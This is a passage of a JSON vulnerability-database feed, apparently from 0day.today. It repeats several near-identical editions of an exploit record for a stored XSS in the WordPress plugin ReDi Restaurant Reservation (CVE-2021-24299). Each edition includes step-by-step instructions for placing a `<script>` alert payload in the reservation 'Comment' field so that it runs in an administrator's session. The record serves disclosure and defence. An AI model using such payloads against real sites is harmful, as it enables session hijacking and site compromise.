0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-02T22:41:27", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "92c825ad39dc14d4163a3efd14910cdd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-04T06:50:14", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:50:14", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "971170b10de7936f4b80e211d417d667", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-05T02:42:53", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T02:42:53", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "bdeb761b78b0d0a3e6442ba1b86a4c61", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-05T22:41:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-05T22:41:20", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "b02cb231543751f62155a9967420532c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-06T22:47:05", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:47:05", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "590d4b2bfae0afa11cf913478abdc73b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-08T00:47:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:47:25", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "2a0431ae6b99090c4d790c7589e3dabd", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-08T22:44:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T22:44:20", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "05098802b533063fb39817a5612169c9", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-09T22:46:33", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:46:33", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "bcee41c129ba3cc5656402e663da49b9", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-10T22:51:11", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-10-10T22:51:11", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-10-10T22:51:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-10T22:51:11", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "ecaac674befbfd4c7873f522a2fa1cf6", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": 